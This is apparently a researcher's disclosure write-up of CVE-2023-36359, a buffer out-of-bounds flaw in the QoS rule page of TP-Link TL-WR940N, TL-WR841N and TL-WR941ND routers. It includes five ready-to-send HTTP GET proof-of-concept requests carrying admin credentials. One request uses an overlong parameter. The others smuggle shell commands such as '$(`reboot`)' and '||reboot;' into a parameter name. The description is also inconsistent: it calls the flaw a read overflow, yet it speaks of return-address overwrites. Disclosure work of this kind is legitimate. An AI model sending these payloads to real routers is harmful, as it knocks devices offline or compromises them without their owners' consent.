Headline
CVE-2023-36359: iotvul/tp-link/8/TP-Link TL-WR940N TL-WR841N TL-WR941ND wireless router userRpmQoSRuleListRpm buffer read out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul
TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.
TP-Link TL-WR940N/TL-WR841N/TL-WR941ND wireless router /userRpm/QoSRuleListRpm buffer read out-of-bounds vulnerability****1 Basic Information
- Vulnerability Type: Buffer read out-of-bounds
- Vulnerability Description: A buffer overflow vulnerability exists in TP-Link TL-WR940N V4, TP-Link TL-WR841N V8/V10, TP-Link TL-WR940N V2/V3 and TP-Link TL-WR941ND V5/V6 wireless router. Its /userRpm/QoSRuleListRpm implementation has a security vulnerability in processing the protocol GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
- Device model:
- TP-Link TL-WR940N V4
- TP-Link TL-WR841N V8/V10
- TP-Link TL-WR940N V2/V3
- TP-Link TL-WR941ND V5/V6
2 Vulnerability Value
Maturity of Public Information: None
Order of Public Vulnerability Analysis Report: None
Stable reproducibility: yes
Vulnerability Score (refer to CVSS)
- V2:8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
- V3.1:9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Exploit Conditions
- Attack Vector Type: Network
- Attack Complexity: Low
- Complexity of Exploit
- Permission Constraints: authentication is required
- User Interaction: No victim interaction required
- Scope of Impact: Changed (may affect other components than vulnerable ones)
- Impact Indicators:
- Confidentiality: High
- Integrity: High
- Availability: High
- Stability of vulnerability exploitation: Stable recurrence
- Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
Exploit Effect
- Denial of Service
3 PoC
The PoC of TP-Link TL-WR940N is as follows:
GET /IOCGBYQCLXJSWZMC/userRpm/QoSRuleListRpm.htm?enable=true&start_ip_addr=192.168.0.4&end_ip_addr=192.168.0.6&start_port=17&end_port=20&protocolaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=0&min_up_band_width=0&max_up_band_width=0&min_down_band_width=0&max_down_band_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1 Host: 127.0.0.1:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://127.0.0.1:8081/IOCGBYQCLXJSWZMC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1
The PoC of TP-Link TL-WR841N V10 is as follows:
GET /CTVJVVOCIAAMCXNC/userRpm/QoSRuleListRpm.htm?enable=true&start_ip_addr=192.168.0.4&end_ip_addr=192.168.0.6&start_port=2&end_port=4&$(`reboot`)=0&min_up_band_width=0&max_up_band_width=0&min_down_band_width=0&max_down_band_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1 Host: 127.0.0.1:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://127.0.0.1:8081/CTVJVVOCIAAMCXNC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1
The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:
GET /MZKBGETBFITRVSAA/userRpm/QoSRuleListRpm.htm?enable=true&start_ip_addr=192.168.0.3&end_ip_addr=192.168.0.34&start_port=21&end_port=24&protocol|reboot;=0&min_up_band_width=12&max_up_band_width=21&min_down_band_width=12&max_down_band_width=21&Save=Save&curEditId=0&Page=1 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1
The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:
GET /IOCGBYQCKLVYFARA/userRpm/QoSRuleListRpm.htm?enable=true&start_ip_addr=192.168.0.9&end_ip_addr=192.168.0.11&start_port=12&end_port=21&||reboot;=0&min_up_band_width=10&max_up_band_width=30&min_down_band_width=10&max_down_band_width=30&Save=Save&curEditId=0&Page=1 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1 Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1
The PoC of TP-Link TL-WR841N V8 is as follows:
GET /userRpm/QoSRuleListRpm.htm?enable=true&start_ip_addr=192.168.0.3&end_ip_addr=192.168.0.5&start_port=23&end_port=45&protocol&&reboot=0&min_up_band_width=10&max_up_band_width=100&min_down_band_width=0&max_down_band_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1 Host: 0.0.0.0:49169 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://0.0.0.0:49169/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1 Cookie: Authorization= Upgrade-Insecure-Requests: 1
4 Vulnerability Principle
When the Web management component receives a GET request, its /userRpm/QoSRuleListRpm component implements a security vulnerability in processing the protocol GET key parameter. The length of the parameter key of protocol can be any length and it is put into the stack without any boundary check, resulting in a read out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.
The firmware is simulated by means of simulation, the simulation process and interface are as follows:
After sending the PoC, a buffer read out-of-bounds memory error occurred, encountered an unexpected fatal signal 11 error and a BadVA error, causing the program to crash.
5. The basis for judging as a 0-day vulnerability
Search the QoSRuleListRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).
Search the QoSRuleListRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).